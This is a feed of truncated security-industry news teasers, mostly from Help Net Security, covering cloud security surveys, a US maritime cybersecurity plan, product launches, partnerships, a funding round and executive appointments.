Enterprises were already moving toward digital transformations at the start of 2020, but the COVID-19 pandemic suddenly threw everything into high gear. Telework, virtual meetings and a host of online transactions – from retail purchases and food ordering to interviewing and onboarding employees – went from being occasional occurrences to being the norm. With enterprises using the cloud for more and more of their operations, the adoption of “as-a-Service” offerings has grown swiftly in nearly … More

The post Are you vetting your MSSPs? appeared first on Help Net Security.

Product showcase: Pentest Robots

Security testing automation is not about building tech to replace humans. We don’t adhere to that limiting view because it fails to capture the complexity and depth of security testing. Instead, we believe automation should enhance uniquely human abilities such as critical thinking and subjective judgment. A good pentester can never be replaced by a robot. But a robot can make them exponentially more effective. Here’s what we mean. How Pentest Robots work Security pros … More

The post Product showcase: Pentest Robots appeared first on Help Net Security.

Visibility, control and governance holding back cloud transformation

While 91% of organizations were successful in increasing security as a result of adopting cloud services, it remains a top concern for many, a part two of an Aptum study reveals. The report identifies common security, compliance and governance challenges impacting organizations undergoing cloud transformation. The research reveals that 51% of survey respondents see security as the main driver behind cloud adoption. However, 38% cite security and data protection as the primary barrier to cloud … More

The post Visibility, control and governance holding back cloud transformation appeared first on Help Net Security.

U.S. National Cybersecurity Plan Promises to Safeguard Maritime Sector

The U.S. Government released on January 5, 2021, a cybersecurity plan to secure the nation’s maritime sector against cybersecurity threats that could endanger national security. The Maritime Cyber Environment With International Maritime Organization’s (IMO) mandate “to ensure that cyber risks are appropriately addressed in existing safety management systems” and the increasing number of cyber-attacks against maritime […]… Read More

The post U.S. National Cybersecurity Plan Promises to Safeguard Maritime Sector appeared first on The State of Security.

Worldwide SD-WAN market to reach valuation of $53 billion by end of 2030

A software-defined wide area network is a type of computer network that allows the bounding of multiple internet access resources, such as cables, digital subscriber lines (DSL), and cellular or any other IP transport to provide high throughput data channels. WAN solutions improve application performance, reduce costs, increase agility, and address various IT challenges. Enterprises are adopting SD-WAN solutions for threat protection, efficient offloading of expensive circuits, and simplification of WAN network management. IT infrastructure … More

The post Worldwide SD-WAN market to reach valuation of $53 billion by end of 2030 appeared first on Help Net Security.

How to defend against today’s top 5 cyber threats

Cyber threats are constantly evolving. As recently as 2016, Trojan malware accounted for nearly 50% of all breaches. Today, they are responsible for less than seven percent. That’s not to say that Trojans are any less harmful. According to the 2020 Verizon Data Breach Investigations Report (DBIR), their backdoor and remote-control capabilities are still used by advanced threat actors to conduct sophisticated attacks. Staying ahead of evolving threats is a challenge that keeps many IT … More

The post How to defend against today’s top 5 cyber threats appeared first on Help Net Security.

My Office Apps Kechie 2021 ERP: Enabling quick access to business-critical information in real time

My Office Apps announced the availability of Kechie 2021 Enterprise Resource Planning (ERP) software, a cloud-based solution, enabling quick access to business-critical information in real time. The company has raised the Software as a Service (SaaS) bar by delivering innovative features to make small-to-medium sized manufacturing, distribution, and non-profit operations more productive and competitive, while increasing efficiency and effectiveness. With over thirty years of business solutions, Kechie is a proven leader in business transformation software … More

The post My Office Apps Kechie 2021 ERP: Enabling quick access to business-critical information in real time appeared first on Help Net Security.

Neurotechnology SentiVeillance 8.0 SDK: Creating identification by using live video streams

Neurotechnology announced the release of the SentiVeillance 8.0 software development kit (SDK). With SentiVeillance SDK, developers can create identification solutions that use live video streams from digital surveillance cameras or video files. The latest version adds face detection and recognition of people who are wearing masks and includes new algorithms that improve license plate detection and recognition speed and accuracy. It also provides new features for vehicle and human (VH) mode, including car make and … More

The post Neurotechnology SentiVeillance 8.0 SDK: Creating identification by using live video streams appeared first on Help Net Security.

DigiPlex signs agreement with HPE to host AI and HPC technology in its Stockholm data center

DigiPlex has signed an agreement with Hewlett Packard Enterprise (HPE) to host AI and High-Performance Computing (HPC) technology in its Stockholm data center. The DigiPlex Stockholm campus is located close to Arlanda, the capital airport of Sweden, the perfect geographical location for business needs. The multi award-winning campus runs on electricity from 100% renewable energy and offers 26,000 m² with up to 40 MW capacity which makes it attractive to businesses from a sustainability perspective. … More

The post DigiPlex signs agreement with HPE to host AI and HPC technology in its Stockholm data center appeared first on Help Net Security.

Reply and AWS develop industry solutions for different businesses

Reply announces it has signed a strategic collaboration agreement (SCA) with Amazon Web Services (AWS) to develop industry solutions for financial services, manufacturing, automotive, retail, energy, and telco customers. Through this SCA, the Reply Group of companies dedicated to AWS – Comsysto Reply, Data Reply, Sense Reply, and Storm Reply – will work with organizations of virtually all sizes and allow them to innovate faster and deliver consistent improvements on their business processes using advanced … More

The post Reply and AWS develop industry solutions for different businesses appeared first on Help Net Security.

IAR Build Tools for Linux now supported by Parasoft C/C++test

Parasoft announced its C/C++test update to support IAR Systems’ build tools for Linux for Arm. IAR Build Tools for Linux inspired the update of Parasoft’s unified testing solution for C/C++test software development. With these tools combined, software developers gain the ability to configure fast and scalable CI/CD pipelines on Linux servers and automate the testing process. IAR Build Tools for Linux uses the leading build tools from IAR Embedded Workbench and empowers software developers who … More

The post IAR Build Tools for Linux now supported by Parasoft C/C++test appeared first on Help Net Security.

RunSafe Security and ReleaseTEAM partner to deliver more security options to DevOps clients

RunSafe Security announced a partnership with ReleaseTEAM, a full-service DevOps consulting firm. With this relationship, ReleaseTEAM delivers even more security options to its DevOps clients. “Given ReleaseTEAM’s mission to empower customers on their DevOps journey, security was a crucial consideration for the company,” said Joe Saunders, CEO of RunSafe Security. “Alkemist was a logical fit to their portfolio and allows for a secure move from traditional software development lifecycle practices to a modern DevOps environment.” … More

The post RunSafe Security and ReleaseTEAM partner to deliver more security options to DevOps clients appeared first on Help Net Security.

DocuSign closes offering of 0% convertible senior notes due 2024 for gross proceeds of $690M

DocuSign announced that it has closed its offering of 0% convertible senior notes due 2024 for gross proceeds of $690.0 million, including the full exercise of the $90.0 million option to purchase additional notes granted by DocuSign to the initial purchasers. The notes were sold only to qualified institutional buyers pursuant to Rule 144A under the Securities Act of 1933, as amended (the “Act”). The notes are general unsecured, senior obligations of DocuSign that do … More

The post DocuSign closes offering of 0% convertible senior notes due 2024 for gross proceeds of $690M appeared first on Help Net Security.

Zluri raises $2M to expand sales, marketing, and engineering functions

Zluri announced a seed investment of $2M from Endiya Partners and Kalaari Capital. The funding will help expand sales, marketing, and engineering functions and build integrations and no-code workflow automation for SaaS applications. Founded by Sethu Meenakshisundaram, Ritish Reddy, and Chaithanya Yambari, Zluri was born out of challenges experienced first-hand by the founding team. Today, 3rd party SaaS solutions used by corporates do not follow systems or processes to manage them, leading to hidden dollar … More

The post Zluri raises $2M to expand sales, marketing, and engineering functions appeared first on Help Net Security.

CI Security appoints Steve Sedlock as CRO and Kristoffer Turner as VP of Security Operations

CI Security announced the addition of Steve Sedlock as the company’s Chief Revenue Officer (CRO) and the promotion of Kristoffer Turner to Vice President of Security Operations for the Critical Insight Security Operations Centers. “CI Security is quickly becoming the go-to resource for cyber security services and solutions in the market. With the addition of Steve Sedlock and the promotion of Kristoffer Turner, we are investing to enhance a world-class executive team,” said Garrett Silver, … More

The post CI Security appoints Steve Sedlock as CRO and Kristoffer Turner as VP of Security Operations appeared first on Help Net Security.

SAP appoints Julia White and Scott Russell to the Executive Board

SAP announced that the Supervisory Board appointed Julia White and Scott Russell to the Executive Board. White will take a new Executive Board role as chief marketing and solutions officer. Russell will head SAP’s Customer Success organization. He will succeed Adaire Fox-Martin, who has informed the Supervisory Board that she will depart the company at the end of the month. “We are very pleased to have both Julia and Scott join the Executive Board to … More

The post SAP appoints Julia White and Scott Russell to the Executive Board appeared first on Help Net Security.

Options names Kieran Northime VP of Software Development

Options has announced former NYSE Euronext executive, Kieran Northime as VP of Software Development. Kieran joins Options with three decades of experience across infrastructure, market data and software development, following roles with Wombat Financial Software, Lehman Brothers, Misys (now Finastra), and at NYSE Euronext, where he was VP of Technology, Exchange Solutions. Prior to Options, Kieran most recently founded bespoke systems solution company, Black Eye Technology. He has experience working with a wide range of … More

The post Options names Kieran Northime VP of Software Development appeared first on Help Net Security.

Raymond Brancato joins Tufin as Chief Revenue Officer

Tufin announced that Raymond Brancato has been appointed Chief Revenue Officer, reporting directly to CEO and co-founder Ruvi Kitov. In his new role, Mr. Brancato will be responsible for building on the company’s momentum by leading Tufin’s sales efforts across all products globally. Tufin’s current SVP of Global Sales, Kevin Maloney, will assist with the transition through the end of March after a tenure of five and a half years, during which time revenues tripled … More

The post Raymond Brancato joins Tufin as Chief Revenue Officer appeared first on Help Net Security.